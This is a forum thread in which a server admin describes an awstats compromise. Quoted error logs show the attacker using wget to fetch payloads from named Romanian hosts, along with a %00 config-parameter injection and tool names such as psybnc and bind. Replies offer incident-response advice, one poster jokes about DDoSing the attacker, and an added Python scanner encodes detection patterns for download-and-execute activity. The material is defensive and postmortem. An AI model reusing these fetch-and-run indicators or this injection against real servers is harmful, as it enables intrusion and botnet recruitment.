nothing ruins a day like getting hacked

Soybomb, Diamond Member, Jun 30, 2000
So I was poking around httpd-errors today and found:

--07:04:28-- http://www.zaludu.home.ro/za.tgz
=> `za.tgz'
Resolving www.zaludu.home.ro... done.
Connecting to www.zaludu.home.ro[81.196.20.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,141 [application/x-compressed]

0K ......... 100% 14.39 KB/s

07:04:32 (14.39 KB/s) - `za.tgz' saved [10141/10141]

%00/awstats.mysite.com.conf: not found
--07:05:06-- http://www.linux-help.as.ro/h
=> `h'
Resolving www.linux-help.as.ro... done.
Connecting to www.linux-help.as.ro[193.230.153.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

0K .......... .......... .......... .......... . 21.16 KB/s

07:05:11 (21.16 KB/s) - `h' saved [42481]

./h: 1: Syntax error: redirection unexpected
%00/awstats.mysite.com.conf: not found
wget: not found
chmod: h: No such file or directory
./h: not found
%00/awstats.mysite.com.conf: not found

Anyway a little panic set in and I quickly did a sockstat and saw among other things a connection to a foreign ip running sh and another program connected to a foreign ip running on port 6667. IRC and owned...yay. Anyway I'm guessing I missed a vulnerability in awstats that allows remote command execution and someone used that to download and unpack a rootkit. I'm still not sure how they got shell though since I would think it would be limited to the www user that the awstats script would run under.

Anyway, the moral of the story is: be sure you not only keep your services patched but also watch those dumb apps you've forgotten you have and be sure they're not the weak link. Also, if you have any insight or ideas I'd love to hear them. I didn't want to risk someone noticing they were discovered and doing anything, so I just grabbed my httpd-error logs and shut down the server. I'll be able to do the autopsy tomorrow.
 

cleverhandle, Diamond Member, Dec 17, 2001
Originally posted by: PorBleemo
Another reason why I don't use IRC.

The vuln had nothing to do with IRC. It was in awstats, an online site statistics script. The cracker ran an IRC daemon after he got access.

@Soybomb: Sucks dude, sorry. It's a good lesson, however, for limiting access even to legitimate services. There's probably little reason for letting a statistics script be accessible to everyone, so the directory could have been restricted to your local network by an .htaccess file. That being said, from what I can see of the vulnerability online, it shouldn't let anyone root you, unless there were other things misconfigured. If you have a Tripwire-like system to check out your system files, you might be OK. Of course, there's only one way to be certain unfortunately...
 

Soybomb, Diamond Member, Jun 30, 2000
Sadly it's been really busy lately, and after updating the system last time to 4.11 I didn't update the Tripwire database. I'm with you in that I think while they may have had a shell, I don't see anything that would have let them escalate their privileges to root from www.

It looks like it's been a real playground:
fm.tgz 174 kB 27 kBps
b.c 2124 B 318 kBps
psybnc.tgz 559 kB 52 kBps
psybnc.conf 77 B 194 kBps
override rwxr-xr-x www/wheel for sh? (y/n [n]) not overwritten
./bind: not found
./rat: not found
./mailme: not found
tar (child): tw.tar.gz: Cannot open: No such file or directory

In the interest of practicing what you preach (and fear of a keystroke logger I don't find) I'm going to just suck it up and waste a day reformatting and restoring.
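As an added example (not part of Soybomb's posts or any tool mentioned in the thread), here is what a defender can do with the two httpd-error excerpts quoted above: a small Python scanner that labels the indicators visible in them, namely the `%00`-terminated awstats config name (a NUL byte cutting short input meant for the script's config-file parameter, which is consistent with the remote command execution the first post guesses at), wget's download banners, shell utilities such as wget/chmod/tar writing errors into the web server's stderr, and `./file` executions like `./h`, `./bind` and `./rat`, and then ties a file wget saved to a later attempt to run it. The sample log lines are constructed to mirror the excerpts with placeholder host names; the rule names and functions are my own and are not from awstats, Apache or FreeBSD.

```python
import re
from typing import Dict, List

# Constructed sample, modelled on the excerpts quoted in the thread. Host names
# and timestamps are placeholders, not indicators from any real incident.
SAMPLE_ERROR_LOG = """\
[Sun Feb 06 07:04:00 2005] [notice] Apache configured -- resuming normal operations
--07:04:28-- http://example.invalid/za.tgz
=> `za.tgz'
07:04:32 (14.39 KB/s) - `za.tgz' saved [10141/10141]
%00/awstats.mysite.com.conf: not found
--07:05:06-- http://example.invalid/h
=> `h'
07:05:11 (21.16 KB/s) - `h' saved [42481]
./h: 1: Syntax error: redirection unexpected
%00/awstats.mysite.com.conf: not found
wget: not found
chmod: h: No such file or directory
./h: not found
[Sun Feb 06 07:06:00 2005] [error] [client 203.0.113.9] File does not exist: /favicon.ico
"""

# Each rule is (name, pattern). Rules are tried in order; the first match labels the line.
RULES = [
    # A NUL byte (%00) followed by an awstats config name: input meant for the
    # config-file parameter was terminated early and the remainder reached a shell.
    ("awstats-config-injection", re.compile(r"%00/.*awstats.*\.conf\b")),
    # wget's progress banner: the httpd process is fetching something from outside.
    ("tool-download", re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(?P<url>\S+)")),
    # wget's completion line, capturing the local file name that was written.
    ("tool-saved", re.compile(r"`(?P<file>[^']+)' saved \[")),
    # A shell launching a file from its working directory (./h, ./bind, ./rat ...).
    ("local-exec", re.compile(r"^\./(?P<file>[^:\s]+):")),
    # Shell utilities that have no reason to write errors into httpd's stderr.
    ("shell-utility", re.compile(
        r"^(?P<cmd>wget|chmod|tar|curl|fetch)\b.*(not found|No such file|Cannot open)")),
]


def scan_error_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious line: line number, rule name, captured detail."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            match = pattern.search(line)
            if match:
                detail = next((v for v in match.groupdict().values() if v), "")
                findings.append({"line": lineno, "rule": name, "detail": detail, "text": line})
                break  # one label per line is enough for triage
    return findings


def summarize(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count findings per rule, e.g. {'tool-download': 2, ...}."""
    counts: Dict[str, int] = {}
    for finding in findings:
        rule = str(finding["rule"])
        counts[rule] = counts.get(rule, 0) + 1
    return counts


def download_exec_chain(findings: List[Dict[str, object]]) -> List[str]:
    """Names of files that wget saved and a shell later tried to run: the
    download-and-execute pattern that separates a compromise from mere probing."""
    saved = {str(f["detail"]) for f in findings if f["rule"] == "tool-saved"}
    executed = {str(f["detail"]) for f in findings if f["rule"] == "local-exec"}
    return sorted(saved & executed)


if __name__ == "__main__":
    found = scan_error_log(SAMPLE_ERROR_LOG)
    for f in found:
        print(f"line {f['line']:>3}  {f['rule']:<26} {f['text']}")
    print("summary:", summarize(found))
    print("downloaded then executed:", download_exec_chain(found))
```

Run it against a real `httpd-error.log` by passing the file's contents to `scan_error_log`; a non-empty result from `download_exec_chain` is the strongest signal in the set, since a probe that merely tickles the config-file parameter produces only the `%00` lines, while a successful one is followed by the fetch-then-run sequence the thread shows.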
 

jamesbond007, Diamond Member, Dec 21, 2000
Originally posted by: Soybomb
In the interest of practicing what you preach (and fear of a keystroke logger I don't find) I'm going to just suck it up and waste a day reformatting and restoring.

Ouch, sounds like the hacker definitely had their fair share of fun. After you are done formatting, updating, etc., are you absolutely sure the person cannot get in again? Perhaps you should study the attack a bit more to be sure you find the source or weak spot.

At any rate, it's probably a good thing to do a restore, considering the number of files added to the server and who knows how many were modified.

Good luck with the restoration! Too bad we can't just report the URL/IP to someone who can DDoS the server to death. :D Then let's see the prick try to upload anything from it. :p Although, we would just be stooping down to their level of dumbass-ness... at least we'd have fun doing it though. ;)
 

skyking, Lifer, Nov 21, 2001
That blows, man. After reading this, I went through a few years of logs.
I really looked at all the attempts, and there were plenty. Then I purged it and started over. It sounds like you are in the clear, but I understand your resolution to nuke.
 

drag, Elite Member, Jul 4, 2002
Personally I would take the drive out and save it for later. (although I've been told that was a very bad idea).

Then I'd get a new hard drive and install from scratch, probably with the newest stable version of FreeBSD, if possible. I wouldn't trust any binaries from your system or any of your data files, unless you go over them with a fine-tooth comb. Then the sucky part is looking at your other machines and making sure that they aren't compromised too...

Like if you use the same root password on this machine and on another, then I figure it's safe to assume the other machine is compromised too... as well as any user accounts. Especially if you use telnet, ftp, and such, where they can sniff passwords and such off of the local network. If I was a script kiddie and got a machine on a network with other servers or other machines, then I would take another machine over, play very low-key on that one, and then do my stuff on the machine I cracked first. That way I would always have a back door onto the network if they find, fix, and secure the machine that I am playing with.
 

Soybomb, Diamond Member, Jun 30, 2000
Originally posted by: jamesbond007
Originally posted by: Soybomb
In the interest of practicing what you preach (and fear of a keystroke logger I don't find) I'm going to just suck it up and waste a day reformatting and restoring.

Ouch, sounds like the hacker definitely had their fair share of fun. After you are done formatting, updating, etc., are you absolutely sure the person cannot get in again? Perhaps you should study the attack a bit more to be sure you find the source or weak spot.

At any rate, it's probably a good thing to do a restore, considering the number of files added to the server and who knows how many were modified.

Good luck with the restoration! Too bad we can't just report the URL/IP to someone who can DDoS the server to death. :D Then let's see the prick try to upload anything from it. :p Although, we would just be stooping down to their level of dumbass-ness... at least we'd have fun doing it though. ;)
Quite positive it was awstats that they found their way in through. I'm either going to find a new stats package that I can install and forget and/or .htaccess it too. I won't DDoS, but I vote we all block Russia at the router until they start arresting people :D

I'd consider new drives just to poke around and see what all was done, but it's RAID so that's a bit of cash to drop for fun. You're right though drag, I do not look forward to checking other machines in its IP block, but honestly I don't think they went for them. If I had to guess, they used Google to find vulnerable instances of awstats, compromised them, and installed their IRC bots that linked in a botnet for DDoS. I think actually trying other exploits was too much effort. I do hope that they didn't get root locally though, so I don't have to worry about keystroke loggers.
 

jamesbond007, Diamond Member, Dec 21, 2000
Just an FYI, .ro means it was a machine in Romania. Think it'd be worth your time to swap emails with the owner of the address?

Right now I'm checking out www.home.ro. My guess is that http://www.zaludu.home.ro/ was a homepage of some user on the home.ro network. If you send an email to the admins/abuse lines at home.ro, you might get some action taken, providing you save the logs. The URL looks a lot like username.aol.com for AOL users' homepages. It's just a guess, but it might be worth a shot to get back at this user.

Perhaps they can ban the user on the network or ISP? If you need help translating things, I have several foreign contacts who can do English > Romanian and Romanian > English translations.
 

Soybomb, Diamond Member, Jun 30, 2000
Ohhh yeah, wrong extension/country... doh... down with Romania!

Cool, thanks for the translation help, I might take you up on it later. When I get to the machine I'm going to pick apart the shell and see if I can get an IP where the user was; I bet it's not the same as where he pulled the tools from.
 

n0cmonkey, Elite Member, Jun 10, 2001
These web applications are getting bigger and buggier. I'm liking them less and less, and liking systrace more and more.